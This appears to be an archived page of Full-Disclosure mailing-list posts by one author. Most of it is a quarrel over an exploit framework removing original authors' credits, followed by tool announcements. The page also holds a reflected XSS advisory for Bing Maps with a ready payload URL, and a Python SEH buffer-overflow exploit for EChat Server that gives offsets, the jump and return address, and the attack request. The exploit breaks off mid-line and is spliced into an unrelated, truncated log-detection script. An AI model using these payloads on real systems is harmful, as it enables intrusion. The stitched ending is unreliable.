Re: [Full-disclosure] FW: Curso online - Profesional pentesting - Promocion ( 25% de descuento )

2012-05-21 Thread Juan Sacco
Michele Orru.. Sorry to write you directly to the list.. But you did it
too.. So.. please allow me to answer..

Exploit Pack != Beef ... Just similar projects.. different approaches

In fact you came to a webcast where I showed the code of Exploit Pack... I
remember you saying that Exploit Pack is a cool project...

Please check out our javascript agent...
http://www.exploitpack.com/Gate/jsacco.js
http://www.exploitpack.com/Gate/PLAINdoMagic.js

I am not pointing a gun at you.. if you do not like Exploit Pack tools..
just do not use our tools...

In my personal opinion, beef is a good project, in fact I am a big fan of
it. But it doesn't work like I want it, beef cannot handle more than 10
bots.. almost all the times I run the ruby project it crashes.. also some
modules don't work either.. the popup persistent is old and does not work on
recent browsers.. among other things.. Also beef doesn't have any module for
defense like clientside SQLi / XSS protection...

SQLi: http://www.youtube.com/watch?v=kD2gI8giOQA
XSS: http://www.youtube.com/watch?v=1rYy5SA9PPs&feature=relmfu

Regards
JSacco

On Sun, May 20, 2012 at 7:40 AM, Michele Orru antisnatc...@gmail.com wrote:

 And btw, his WebSecurity tool is a pure clone of BeEF.

 If you try it, and analyze the Javascript hook file, it is the same thing.
 He just changed the global variable name from beef to bot, leaving
 everything else :D including the BeEF version he used to copy from.

 LOL.

 On Sun, May 20, 2012 at 8:30 AM, BMF badmotherfs...@gmail.com wrote:
  Actually, this Juan Sacco assclown has been pissing me off too. I'm in
  some group with him on linkedin and getting his messages. I keep
  flagging them as spam. I wish I knew how to get him to stop emailing
  and messaging me.
 
  Juan: Knock it off, you disaffected deleterious douchenozzle.
 
  On Sat, May 19, 2012 at 10:44 AM, Charles Morris cmor...@cs.odu.edu
 wrote:
  I request your permission to test any and all of your facilities in
 any way I deem appropriate including (but not limited to) your personal
 machines, the machines of your coworkers and family, and any other device I
 deem within scope of my testing.   Further, I request you to grant full,
 unlimited access and authorization for me to test these devices in any way
 I see fit with full unadulterated impunity.
 
 
  stop flexing
 
  ___
  Full-Disclosure - We believe in it.
  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
  Hosted and sponsored by Secunia - http://secunia.com/
 



 --
 /antisnatchor


[Full-disclosure] Video tutorial: Stack-Based Buffer Overflow

2012-05-16 Thread Juan Sacco
I've made a video tutorial about buffer overflows. Take a look and share it
if you like it!

Video tutorial: http://www.youtube.com/watch?v=yPKCSXK8ZYo

Enjoy!

Re: [Full-disclosure] New open source Security Framework

2011-10-06 Thread Juan Sacco
If you want the right to demand certain things from the program, then go BUY
a program and do not harass people who are writing software for free, or go
and help the developers by writing the functionality yourself.

Juan Sacco

On Wed, Oct 5, 2011 at 6:32 AM, root ro...@fibertel.com.ar wrote:

 - * @author Stefan Zeiger (szei...@novocode.com)
 - printWritten by Blake  
 - Information Author=Blake Date=August 23 2011 Vulnerability=N/A

 +#Exploit Pack - Security Framework for Exploit Developers
 +#Copyright 2011 Juan Sacco http://exploitpack.com
 +#
 +#This program is free software: you can redistribute it and/or modify
 it under the terms of the
 +#GNU General Public License as published by the Free Software
 Foundation, either version 3
 +#or any later version.
 +#
 +#This program is distributed in the hope that it will be useful, but
 WITHOUT ANY WARRANTY;
 +#without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
 PARTICULAR
 +#PURPOSE. See the GNU General Public License for more details.
 +#
 +#You should have received a copy of the GNU General Public License
 along with this program.
 +#If not, see http://www.gnu.org/licenses/
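
Review bot: the three removed lines at the top of this hunk ("@author Stefan Zeiger", "Written by Blake", "Author=Blake") are the only author credits shown, and the added header puts "Copyright 2011 Juan Sacco" in their place. Adding a GPL notice does not require deleting existing attribution, so keep the original author lines and place the license header next to them. The added notice also reads "either version 3 or any later version", which drops the "of the License, or (at your option)" wording of the standard GPLv3 notice; use the standard text.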



 Ys why not?


Re: [Full-disclosure] New open source Security Framework

2011-10-06 Thread Juan Sacco
As you might know, or not know, Exploit Pack is working without any
foundation, company, government and money-giving guy.
There is no professional coder, programmer that is paid to develop this
program.

I have tried to ensure that the name of the exploit author is seen in all
the software. It was my bad pasting the license there, but hey! I'm human, give
me a break you troll.

The next time would be better if you post it in the right place, GitHub.

And in fact you're trying to blame here.

Exploit Pack is licensed GPL, let me copy & paste the 4 freedoms. I hope to
do it well this time.

The freedom to run the program, for any purpose (freedom 0).
The freedom to study how the program works, and change it so it does your
computing as you wish (freedom 1). Access to the source code is a
precondition for this.
The freedom to redistribute copies so you can help your neighbor (freedom
2).
The freedom to distribute copies of your modified versions to others
(freedom 3). By doing this you can give the whole community a chance to
benefit from your changes. Access to the source code is a precondition for
this.

Let me ask you why you are spending so much time annoying this GPL software?

I hope next time to get a patch of code from you and no nonsense again.

Like I said to lroot. The same goes for YOU. If you want the right to demand
certain things from the program, then go BUY a program and do not harass
people who are writing software for free, or go and help the developers by
writing the functionality yourself.

Juan Sacco

On Wed, Oct 5, 2011 at 6:36 PM, xD 0x41 sec...@gmail.com wrote:

 wow i was not going to comment on that pack and have not yet looked but,
 thats plain nasty... to remove a simple credit line, i mean it is not full
 of greetz etc :s and replace... totally pathetic.



 On 5 October 2011 20:32, root ro...@fibertel.com.ar wrote:

 - * @author Stefan Zeiger (szei...@novocode.com)
 - printWritten by Blake  
 - Information Author=Blake Date=August 23 2011 Vulnerability=N/A

 +#Exploit Pack - Security Framework for Exploit Developers
 +#Copyright 2011 Juan Sacco http://exploitpack.com
 +#
 +#This program is free software: you can redistribute it and/or modify
 it under the terms of the
 +#GNU General Public License as published by the Free Software
 Foundation, either version 3
 +#or any later version.
 +#
 +#This program is distributed in the hope that it will be useful, but
 WITHOUT ANY WARRANTY;
 +#without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
 PARTICULAR
 +#PURPOSE. See the GNU General Public License for more details.
 +#
 +#You should have received a copy of the GNU General Public License
 along with this program.
 +#If not, see http://www.gnu.org/licenses/



 Ys why not?


Re: [Full-disclosure] New open source Security Framework

2011-10-06 Thread Juan Sacco
Hey,
It's really a shame that you didn't even take like 2 minutes to watch the
source code of Exploit Pack before creating an opinion.
This can't be a copy of CANVAS. Canvas is made on Python. Exploit Pack JAVA.
See the difference? Also, please take a look at the interface design, both
are really different. Show me where Exploit Pack is similar to Canvas! I
think you spent too much time looking for Waldo :-D

We respect the exploit author and that is why I add them at the first line
of the XML file.
You should run the program before creating this crappy post with your
nonsense opinions ( Harassing the free work of others, you wrote like 5 - 6
insulting posts in like.. 2 minutes?.. Dude go find a girl, come on )

Take a look if you want:

<?xml version="1.0" encoding="UTF-8"?>
<Module>

<Exploit NameXML="Free Float FTP Server"
CodeName="FreeFloatFTPServer.py" Platform="windows" Service="ftp"
Type="remote" RemotePort="21" LocalPort="" ShellcodeAvailable="R"
ShellPort="" SpecialArgs="">
</Exploit>

<Information Author="Blake" Date="August 23 2011" Vulnerability="N/A">
Free Float FTP Server USER Command Remote Buffer Overflow Exploit
when parsing the command 'USR', which leads to a stack based overflow.
Also Free Float FTP Server allow remote anonymous login by default
exploiting these issues could allow an attacker to compromise the
application, access or modify data.
</Information>

JSacco

On Wed, Oct 5, 2011 at 8:16 PM, xD 0x41 sec...@gmail.com wrote:

 Heya jeff,
 The author is clearly not smart.
 He is copying other codes, this is a plain rip off of canvas...hehe... and
 same with his insect pro... he stole metasplit for tht one, then he wants
 repect, when we see him removing simplly one line wich would atleast say a
 ty and, show [ppl who writes, is maybe sometimes stabler than other authors,
 it would be better to have this in, not out.. he should be able to see thats
 how it works with exploit code/pocs in general... sometimes, if i see php
 code from one person, i will tend to look, but if it was from an unknown
 person, i prolly wouldnt.
 But this (open sauce) project, i will download and waste 5minutes on.
 Then illm go back to Backbox and BT5 and things wich work :)
 hehe
 (this guy is really mad about his app... and i mean, dang mad angry! I will
 buy some tissues and send to him, that is my donation for his app)
 :))
 xd


 On 6 October 2011 08:59, Jeffrey Walton noloa...@gmail.com wrote:

 On Wed, Oct 5, 2011 at 5:32 AM, root ro...@fibertel.com.ar wrote:
  - * @author Stefan Zeiger (szei...@novocode.com)
  - printWritten by Blake  
  - Information Author=Blake Date=August 23 2011 Vulnerability=N/A
 
  +#Exploit Pack - Security Framework for Exploit Developers
  +#Copyright 2011 Juan Sacco http://exploitpack.com
  +#
  +#This program is free software: you can redistribute it and/or modify
  it under the terms of the
  +#GNU General Public License as published by the Free Software
  Foundation, either version 3
  +#or any later version.
  +#
  +#This program is distributed in the hope that it will be useful, but
  WITHOUT ANY WARRANTY;
  +#without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
  PARTICULAR
  +#PURPOSE. See the GNU General Public License for more details.
  +#
  +#You should have received a copy of the GNU General Public License
  along with this program.
  +#If not, see http://www.gnu.org/licenses/
 GPL V3 - they had to encumber it to set it free?





-- 
_
Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.5 was released stay tunned

Re: [Full-disclosure] New open source Security Framework

2011-10-06 Thread Juan Sacco
Hey.. I already gave you an answer about this.

AGAIN. For the last time.
I respect the author's name of all the exploits added to Exploit Pack, like
you suggest in a terrible and way.. Insulting and posting like 10 mails to
this list. I will add a  # Thank you [AUTHOR NAME ] for let us use your
public script  in the top of all new exploits added to Exploit Pack
Framework.

** Also, I created a mailing list to discuss this kind of things, report
bugs and much more ( But sorry, NO INSULTING is allowed there )  **

As other people told you, stop chatting here. This is not a forum.

JSacco

On Wed, Oct 5, 2011 at 8:57 PM, xD 0x41 sec...@gmail.com wrote:

 <Information Author="Blake" Date="August 23 2011" Vulnerability="N/A">
 Free Float FTP Server USER Command Remote Buffer Overflow Exploit
 when parsing the command 'USR', which leads to a stack based overflow. Also
 Free Float FTP Server allow remote anonymous login by default
 exploiting these issues could allow an attacker to compromise the
 application, access or modify data.
 </Information>


 erm, sorry this dont count, it should be IN the code, not, after running it :P
 thats bs mate, and i wont agree with your crap, until you see my point 
 really. It is, something you write, compared to running thwe GUI..

 xd



 On 6 October 2011 10:47, Juan Sacco juansa...@gmail.com wrote:

 Hey,
 Its really a shame that you didn't even take like 2 minutes to watch the
 source code of Exploit Pack before create an opinion.
 This can't be a copy of CANVAS. Canvas is made on Python. Exploit Pack
 JAVA. See the diference? Also, please take a look at the interface design,
 both are really different. Show me where Exploit Pack is similar to Canvas!
 I think you spent too much time looking for Waldo :-D

 We respect the exploit author and that is why I add them at the first line
 of the XML file
 You should run the program before creating this crappy post with your
 nonsense opinions ( Harassing the free work of others, you wrote lke 5 - 6
 insulting posts in like.. 2 minutes?.. Dude go find a girl, come on )

 Take a look if you want:

 <?xml version="1.0" encoding="UTF-8"?>
 <Module>

 <Exploit NameXML="Free Float FTP Server" CodeName="FreeFloatFTPServer.py"
 Platform="windows" Service="ftp" Type="remote" RemotePort="21" LocalPort=""
 ShellcodeAvailable="R" ShellPort="" SpecialArgs="">
 </Exploit>

 <Information Author="Blake" Date="August 23 2011" Vulnerability="N/A">
 Free Float FTP Server USER Command Remote Buffer Overflow Exploit
 when parsing the command 'USR', which leads to a stack based overflow. Also
 Free Float FTP Server allow remote anonymous login by default
 exploiting these issues could allow an attacker to compromise the
 application, access or modify data.
 </Information>

 JSacco

 On Wed, Oct 5, 2011 at 8:16 PM, xD 0x41 sec...@gmail.com wrote:

 Heya jeff,
 The author is clearly not smart.
 He is copying other codes, this is a plain rip off of canvas...hehe...
 and same with his insect pro... he stole metasplit for tht one, then he
 wants repect, when we see him removing simplly one line wich would atleast
 say a ty and, show [ppl who writes, is maybe sometimes stabler than other
 authors, it would be better to have this in, not out.. he should be able to
 see thats how it works with exploit code/pocs in general... sometimes, if i
 see php code from one person, i will tend to look, but if it was from an
 unknown person, i prolly wouldnt.
 But this (open sauce) project, i will download and waste 5minutes on.
 Then illm go back to Backbox and BT5 and things wich work :)
 hehe
 (this guy is really mad about his app... and i mean, dang mad angry! I
 will buy some tissues and send to him, that is my donation for his app)
 :))
 xd


 On 6 October 2011 08:59, Jeffrey Walton noloa...@gmail.com wrote:

 On Wed, Oct 5, 2011 at 5:32 AM, root ro...@fibertel.com.ar wrote:
  - * @author Stefan Zeiger (szei...@novocode.com)
  - printWritten by Blake  
  - Information Author=Blake Date=August 23 2011
 Vulnerability=N/A
 
  +#Exploit Pack - Security Framework for Exploit Developers
  +#Copyright 2011 Juan Sacco http://exploitpack.com
  +#
  +#This program is free software: you can redistribute it and/or modify
  it under the terms of the
  +#GNU General Public License as published by the Free Software
  Foundation, either version 3
  +#or any later version.
  +#
  +#This program is distributed in the hope that it will be useful, but
  WITHOUT ANY WARRANTY;
  +#without even the implied warranty of MERCHANTABILITY or FITNESS FOR
 A
  PARTICULAR
  +#PURPOSE. See the GNU General Public License for more details.
  +#
  +#You should have received a copy of the GNU General Public License
  along with this program.
  +#If not, see http://www.gnu.org/licenses/
 GPL V3 - they had to encumber it to set it free?


Re: [Full-disclosure] New open source Security Framework

2011-10-06 Thread Juan Sacco
Hey, Wanna Join? and contribute to a GPL Project? Welcome aboard!!!
( Please do me a favor and read the license first )

Wanna keep talking about your personal opinion?

Please.. As it was told stop doing it here, this is not a chatroom. We have
a forum and a mailing list for that.

It would be nice to see you there... Believe me.

I invite you all to the new forum! :-)
http://exploitpack.com

Cheers!


On Wed, Oct 5, 2011 at 8:55 PM, xD 0x41 sec...@gmail.com wrote:

 Juan,
 I have not created any opinion (yet) but, is it rally fair, to give people
 who code, 2 frigging dollars, for sometimes what would be 0day , or is it
 nice, to remove the REAL auithors name, and add your own.
 Thats the only grips i see, without having to look at it yet.
 The whole look of it, without 'using' it tho, looks alot like canvas ;p
 but, thats not bad thing and, i personally, dont mind that, coz canvas, is
 not open and, this one is, wich would be great to bring that feel into it..
 so, your reading tomuch into things, when i mean giving credit to author, i
 dont mean putting in his email/greetings and notes, i mean, simply one line
 to give credit, so people who are using the pack, could atleastfeel sure
 with some coders,that the code will be very nice, and not painful to read or
 , modify even to make it nicer.. that is why i like to always makesure
 authors get some credit, however it may be, it only needbe a nick/name, but
 you are using theyre things, but on your people who your paying, i guess you
 should maybe put in place then rules that, all exploits paid for, would not
 recieve credits, other than, part of devteam or part of exploit-pack
 codepack.
 It aint hard to keep people happy. Whilst still producing quality, or, non
 quality.
 i will run your pack, using ONE well know exploit, and if that fails, i
 will have results here, compared to backbox scan or, another vuln scan,
 then, i will comment further. How does that sound?
 Ok. I will do my research, but, i aint angry at you, nor the product, altho
 i dislike Insect, this one, seems to have some good features. So yea, ill
 take an open look, i only think, if code is NOT paid for, then you should
 put authors name or handle in there somwhere, maybe even something for paid
 exploits... people do appreciate a 'thanks to' sometimes... especially you
 it seems.
 xd


 On 6 October 2011 10:47, Juan Sacco juansa...@gmail.com wrote:

 Hey,
 Its really a shame that you didn't even take like 2 minutes to watch the
 source code of Exploit Pack before create an opinion.
 This can't be a copy of CANVAS. Canvas is made on Python. Exploit Pack
 JAVA. See the diference? Also, please take a look at the interface design,
 both are really different. Show me where Exploit Pack is similar to Canvas!
 I think you spent too much time looking for Waldo :-D

 We respect the exploit author and that is why I add them at the first line
 of the XML file
 You should run the program before creating this crappy post with your
 nonsense opinions ( Harassing the free work of others, you wrote lke 5 - 6
 insulting posts in like.. 2 minutes?.. Dude go find a girl, come on )

 Take a look if you want:

 <?xml version="1.0" encoding="UTF-8"?>
 <Module>

 <Exploit NameXML="Free Float FTP Server" CodeName="FreeFloatFTPServer.py"
 Platform="windows" Service="ftp" Type="remote" RemotePort="21" LocalPort=""
 ShellcodeAvailable="R" ShellPort="" SpecialArgs="">
 </Exploit>

 <Information Author="Blake" Date="August 23 2011" Vulnerability="N/A">
 Free Float FTP Server USER Command Remote Buffer Overflow Exploit
 when parsing the command 'USR', which leads to a stack based overflow. Also
 Free Float FTP Server allow remote anonymous login by default
 exploiting these issues could allow an attacker to compromise the
 application, access or modify data.
 </Information>

 JSacco

 On Wed, Oct 5, 2011 at 8:16 PM, xD 0x41 sec...@gmail.com wrote:

 Heya jeff,
 The author is clearly not smart.
 He is copying other codes, this is a plain rip off of canvas...hehe...
 and same with his insect pro... he stole metasplit for tht one, then he
 wants repect, when we see him removing simplly one line wich would atleast
 say a ty and, show [ppl who writes, is maybe sometimes stabler than other
 authors, it would be better to have this in, not out.. he should be able to
 see thats how it works with exploit code/pocs in general... sometimes, if i
 see php code from one person, i will tend to look, but if it was from an
 unknown person, i prolly wouldnt.
 But this (open sauce) project, i will download and waste 5minutes on.
 Then illm go back to Backbox and BT5 and things wich work :)
 hehe
 (this guy is really mad about his app... and i mean, dang mad angry! I
 will buy some tissues and send to him, that is my donation for his app)
 :))
 xd


 On 6 October 2011 08:59, Jeffrey Walton noloa...@gmail.com wrote:

 On Wed, Oct 5, 2011 at 5:32 AM, root ro...@fibertel.com.ar wrote:
  - * @author Stefan Zeiger (szei...@novocode.com)
  - printWritten

Re: [Full-disclosure] New open source Security Framework

2011-10-06 Thread Juan Sacco
ro...@fibertel.com : I know you don't have any experience with open source
projects, but this is not the right way.
Next time you should try doing it well.

Go to GitHub and write the change on your own. The community will moderate it
and then you will see your proposal applied.
To be clear. The license on the script you mention is the license for all
the software not only for the script. Oki Dokie?

1. This is not a chatting room
2. This is not Exploit Pack Dev list

Having that in mind:

If you feel like you really have to make another nonsense question after you
read all the thread.
Then and just then. Send an email to Exploit Pack Dev list.

Please check: http://exploitpack.com/faq
And: http://www.gnu.org/licenses/gpl-3.0.html if you continue having
questions about GPL v3

I already made a change on the git repository for you root
ro...@fibertel.com.ar and your friend xD 0x41  sec...@gmail.com, hope next
time you spend two cents for this project.

https://github.com/exploitpack/trunk/blob/master/Exploit%20Pack/exploits/code/EasyFTPServer1.7.11.py

#You should have received a copy of the GNU General Public License along
with this program.
#If not, see http://www.gnu.org/licenses/

# Script Author: [Coder Name]
# Thanks for let us use this script on Exploit Pack

JSacco


On Thu, Oct 6, 2011 at 12:34 AM, root ro...@fibertel.com.ar wrote:

 Juan,

 You don't have the faintest idea of how licencing works. You cannot slap
 a GPL v3 license to any software you see, much less erase the author's
 names. If you find a code in the internet without any license, you
 pretty much can't touch it, and must re-implement it completely.

 Software business steal code all the time, but they don't release the
 software for everybody to see!

 Next time instead of a few laughs at a list, you may get sued and lose
 real money, you fool.

 Please learn how licensing works and just then republish all your code.


 On 10/05/2011 06:25 PM, Juan Sacco wrote:
  If you want the right to demand certain things from the program, then go
 BUY
  a program and do not harass people who are writing software for free, or
 go
  and help the developers by writing the functionality yourself.
 
  Juan Sacco
 
  On Wed, Oct 5, 2011 at 6:32 AM, root ro...@fibertel.com.ar wrote:
 
  - * @author Stefan Zeiger (szei...@novocode.com)
  - printWritten by Blake  
  - Information Author=Blake Date=August 23 2011 Vulnerability=N/A
 
  +#Exploit Pack - Security Framework for Exploit Developers
  +#Copyright 2011 Juan Sacco http://exploitpack.com
  +#
  +#This program is free software: you can redistribute it and/or modify
  it under the terms of the
  +#GNU General Public License as published by the Free Software
  Foundation, either version 3
  +#or any later version.
  +#
  +#This program is distributed in the hope that it will be useful, but
  WITHOUT ANY WARRANTY;
  +#without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
  PARTICULAR
  +#PURPOSE. See the GNU General Public License for more details.
  +#
  +#You should have received a copy of the GNU General Public License
  along with this program.
  +#If not, see http://www.gnu.org/licenses/
 
 
 
  Ys why not?
 
 


Re: [Full-disclosure] INSECT Pro - Free tool for pentest - New version release 2.7

2011-08-29 Thread Juan Sacco
You are comparing a new product with others who have years of
development, it is not fair. If you like Core Impact or Metasploit
Express, please pay your license and use them.

I'm not pushing you to use my software. INSECT Pro is free and I do it 
because I like it. Not to like you.

Juan Sacco ( runlvl )

On Mon, 29 Aug 2011 13:24:15 -0300, root wrote:
 On 08/27/2011 08:54 AM, Mario Vilas wrote:
 On Sat, Aug 27, 2011 at 4:27 AM, GloW - XD doo...@gmail.com wrote:

 when is smeone going to warez this... it aint free..


 http://www.insecurityresearch.com/files/





 It's just a GUI slapped to a bunch of public exploits taken from
 metasploit and exploit-db. Totally unlike serious software like
 metasploit-pro and core impact.


-- 
--

Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.6.1 was released stay tunned



Re: [Full-disclosure] INSECT Pro - Free tool for pentest - New version release 2.7

2011-08-29 Thread Juan Sacco
Hey Gage, bad day huh? I don't argue with people on mailing lists. You
are taking INSECT Pro too personally, take it easy.

If you like it, use it, if you don't like it don't use it, if you can do
it better, do it.

Good luck.

Juan Sacco ( runlvl )

On Mon, 29 Aug 2011 16:53:56 -0700, Gage Bystrom wrote:
 People hate you because you've been stealing software, slapping a new
 wrapper on it, and calling it your own.

 All other complaints, criticisms, or even approvals is nothing in
 light of that simple fact. A light that was cast the first time you
 released InsectPro to FD and all you got was a horde of angry
 researchers telling you to shutup and stop sending stupid crap like
 your stolen software to FD.

 No one is telling you to not use, hell only a few people are telling
 you not to share it. But almost everybody is telling you to KEEP CRAP
 LIKE THIS OFF FULL DISCLOSURE.

 You can argue the crap point all you want and be dismissive, but
 you'll just be missing the point.

 On Mon, Aug 29, 2011 at 9:45 AM, Juan Sacco
 jsa...@insecurityresearch.com wrote:
 You are comparing a new product with others who have years of
 development, it is not fair. If you like Core Impact or Metasploit
 Express, please pay your license and use them.

 I'm not pushing you to use my software. INSECT Pro is free and I do 
 it
 because I like it. Not to like you.

 Juan Sacco ( runlvl )

 On Mon, 29 Aug 2011 13:24:15 -0300, root wrote:
 On 08/27/2011 08:54 AM, Mario Vilas wrote:
 On Sat, Aug 27, 2011 at 4:27 AM, GloW - XD doo...@gmail.com 
 wrote:

 when is smeone going to warez this... it aint free..


 http://www.insecurityresearch.com/files/





 It's just a GUI slapped to a bunch of public exploits taken from
 metasploit and exploit-db. Totally unlike serious software like
 metasploit-pro and core impact.


 --
 --
 
 Insecurity Research - Security auditing and testing software
 Web: http://www.insecurityresearch.com
 Insect Pro 2.6.1 was released stay tunned



-- 
--

Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.6.1 was released stay tunned



Re: [Full-disclosure] INSECT Pro - Free tool for pentest - New version release 2.7

2011-08-28 Thread Juan Sacco
INSECT Pro uses native exploits and these are taken from the Internet,
modified and tested to work with our tool, the sources of these exploits
are exploit-db and securityfocus in most cases. It also has support for
some modules of metasploit.

If you look at INSECT PRO exploit description you could check the
source of each one, native or metasploit.

This isn't a company making a big product, I'm doing this because I like
doing it.

I'm not forcing you to use my software, if you don't like it please
don't waste bandwidth on it.

We are working on a JAVA version in order to support multi-platform,
and because I really like JAVA.

We are a small group of developers so we do this in baby steps, we don't
like to receive that kind of criticism from people like you, you should try
to help instead of dropping shit all around the internet

Juan Sacco ( runlvl )

--

Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.7 was released stay tunned

On Sun, 28 Aug 2011 22:43:00 +0100, Jacqui Caren-home wrote:
 On 27/08/2011 23:12, Dan Dart wrote:
 Looks like it's freeWARE but not free per se.
 With the added disadvantage that it runs on none of the platforms I 
 use.
 How sad. 0/5 review from me then.

 http://www.insecurityresearch.com/files/download/

  From the readme's its an old version of metasploit under a wrapper.

 Also anyone from tightvnc want to see if gpl-violations are 
 interested?

 INSECT 
 Pro/exploits/framework/msf3/external/source/tightvnc/LICENCE.TXT

 GNU GENERAL PUBLIC LICENSE
 Version 2, June 1991

Copyright (C) 1989, 1991 Free Software Foundation, Inc.
   59 Temple Place - Suite 330, Boston, MA  02111-1307, USA
   Everyone is permitted to copy and distribute verbatim copies
   of this license document, but changing it is not allowed.
 


-- 
--

Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.6.1 was released stay tunned



[Full-disclosure] INSECT Pro - Free tool for pentest - New version release 2.7

2011-08-26 Thread Juan Sacco
We are happy to announce a new release of INSECT Pro 2.7 including 
changes that people ask about most often

This is a partial list of the major changes implemented in version 2.7

- Available targets now has a submenu under right-click button
- Check update function added in order to verify current version
- Threading support for GET request
- Module log added and functional
- Sniffer support added
- 50 Remote exploits added
- Project saved on userland - Application Data special folder
- Executed module windows added and functionality for it
- AgentConnect now use telnetlib

Download now from: http://www.insecurityresearch.com

Juan Sacco (runlvl)

-- 
--

Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.7 was released stay tunned



[Full-disclosure] INSECT Pro - Advisory 2011 0823 - Zero day - XSS in BING.COM

2011-08-23 Thread Juan Sacco
Information

Name : XSS Reflected on BING.COM
Software : BING.COM MAPS
Vendor Homepage : http://www.bing.com
Vulnerability Type : XSS Reflected
Severity : Very High
Researcher : Juan Sacco (runlvl) jsacco [at] insecurityresearch [dot] 
com

Description
--
BING.COM is prone to a XSS vulnerability because the application fails 
to properly perform adequate boundary checks on user-supplied data.
An attacker can exploit this issue to execute arbitrary code in the 
victim's browser.

Details
---
The reflected XSS vulnerability is a variant of a cross-site scripting
flaw: it occurs when the data provided by the attacker is executed by
the browser, and then displayed on normal pages returned to other
users in the course of regular browsing, without proper HTML escaping. A
classic example of this is with online message boards where users are
allowed to post HTML formatted messages for other users to read

Exploit example as follow
-

http://www.bing.com/maps/embed/Customize.aspx
?v=2
cp=-34.584743~-58.457621
lvl=6
dir=0
sty=c
eo=
where1=';alert(String.fromCharCode(88,83,83,32,98,121,32,114,117,110,108,118,108))///SCRIPT
form=LMLTEW

The vulnerability is caused by the following code and affected by the 
Generate Code map

div id=LME_mapLinks style=line-height: 20px
 a id=LME_largerMap //--gt;quot;gt;'gt; on Bing Maps (New 
window)View Larger Map/a
/div

Solution
---
No patch is available at this time.

Credits
---
Manually discovered by Insecurity Research Labs
Juan Sacco (runlvl) - http://www.insecurityresearch.com

-- 
_
Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.6.1 was released stay tunned



[Full-disclosure] INSECT Pro - Free tool for penetration security testing

2011-08-23 Thread Juan Sacco
INSECT Pro is a new free tool for Penetration Testing and the ultimate 
resource to demonstrate the security or vulnerability of your network.

INSECT Pro goes beyond simply detecting vulnerabilities to safely 
exploiting them. The first free integrated vulnerability and penetration 
testing tool, INSECT is part of the complete solution Insecurity 
Research offers to evaluate the vulnerabilities on your network.

Download now your copy from http://www.insecurityresearch.com and try 
to defeat and test your network security

If you want to collaborate please write us an email to:
insect...@insecurityresearch.com or join our mailing list

Why is it free? We have two new members in our team and that allows us to
keep working and follow our own way. We think that no one should charge 
for knowledge. Of course we have to pay bills, like web space among 
other things.

Insecurity Research is an innovator in software development, our 
products include exploitation development tools, vulnerability 
assessment and remote control technologies.

Juan Sacco ( runlvl )

-- 
--

Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.6.1 was released stay tunned



[Full-disclosure] INSECT Pro - Exploit EChat Server = v2.5 20110812 - Remote Buffer Overflow Exploit

2011-08-12 Thread Juan Sacco
Information

Name : EChat Server = v2.5
Software : E Chat Server
Vendor Homepage : http://www.echatserver.com/
Vulnerability Type : Remote Buffer Overflow Exploit
Severity : High
Researcher : Juan Sacco (Runlvl) jsacco [at] insecurityresearch [dot] 
com

Description
--

EChat Server is prone to a remote buffer-overflow vulnerability because 
it fails to perform adequate boundary-checks on user-supplied data.
Successfully exploiting this issue will allow an attacker to execute 
arbitrary code within the context of the affected application. Failed 
exploit attempts will result in a denial-of-service condition.


Exploit example as follow
-

#!/usr/bin/python
# Easy Chat Server Server = v2.5 Remote Buffer Overflow Exploit
# Written by Juan Sacco (Runlvl)
# Contact: jsa...@insecurityresearch.com
# Web site: http://www.insecurityresearch.com
# Target tested: Windows XP SP3

import string, sys
import socket, httplib
import telnetlib

def howtousage():
    print "Sorry, required arguments: Host Port"
    sys.exit(-1)

def run():
    try:
        # Basic structure: JUNK + NSEH + SEH + SHELLCODE
        Junk = '\x41' * 216 # 216 bytes of A
        nSEH = '\xEB\x06\x90\x90' # JMP 6 bytes short
        SEH = '\xE1\xB2\x01\x10' # 0x1001b2e1 pop edi; pop esi; ret

        # ShellCode Bind TCP PORT 444 Length 751 Encode : Alpha Upper
        ShellCode = ''  # encoded payload bytes omitted
        ShellCodePort = 
        CraftedBuffer = Junk + nSEH + SEH + ShellCode
        vulnerableURL = '/chat.ghp?username=' + CraftedBuffer + '&password=null&room=1&null=2'

        Connection = httplib.HTTPConnection(Host, Port)
        Connection.request('GET', vulnerableURL
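
Seen from the detection side, the request in the post above is recognisable by the length of the `username` parameter alone. This added example (not part of the original post) classifies `GET /chat.ghp` requests from web logs using the layout the post gives (216 filler bytes followed by the 4-byte nSEH and SEH fields); the log format, sample lines, function names and the 64-byte policy limit are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Layout given in the post: 216 filler bytes, then nSEH (4 bytes) and SEH (4 bytes).
FILLER_LEN = 216
SEH_RECORD_END = FILLER_LEN + 4 + 4
# Assumed policy limit for a chat user name; not a value from the post.
MAX_USERNAME = 64

# Assumed log source: a proxy or sensor writing common log format lines.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation addresses, filler bytes only).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Aug/2011:10:00:01 +0000] '
    '"GET /chat.ghp?username=alice&password=x&room=1 HTTP/1.1" 200 512',
    '192.0.2.11 - - [12/Aug/2011:10:00:02 +0000] "GET /index.htm HTTP/1.1" 200 1024',
    '192.0.2.12 - - [12/Aug/2011:10:00:03 +0000] '
    '"GET /chat.ghp?username=' + "B" * 100 + '&password=x&room=1 HTTP/1.1" 200 512',
    '192.0.2.13 - - [12/Aug/2011:10:00:04 +0000] '
    '"GET /chat.ghp?username=' + "A" * FILLER_LEN + "%CC" * 8 + "C" * 40
    + '&password=null&room=1 HTTP/1.1" 502 0',
    '192.0.2.14 - - [12/Aug/2011:10:00:05 +0000] '
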